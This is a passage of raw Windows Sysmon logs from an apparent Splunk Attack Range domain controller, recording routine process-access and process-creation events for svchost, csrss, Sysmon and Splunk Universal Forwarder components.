13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.365{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.348{59A5CD1D-901B-6005-0B01-00000000A301}15122956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.708{59A5CD1D-901C-6005-0D01-00000000A301}37244900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 